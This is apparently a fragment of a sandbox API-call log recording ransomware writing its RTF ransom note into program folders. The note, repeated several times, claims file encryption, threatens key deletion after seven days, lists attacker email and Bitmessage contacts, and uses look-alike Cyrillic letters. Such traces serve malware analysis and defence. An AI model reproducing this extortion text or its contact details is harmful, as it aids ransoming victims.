\\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a558, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0207.817] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a558*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a558*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.817] CloseHandle (hObject=0x2f4) returned 1 [0207.818] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0xffffffff [0207.818] GetLastError () returned 0x2 [0207.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0207.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, 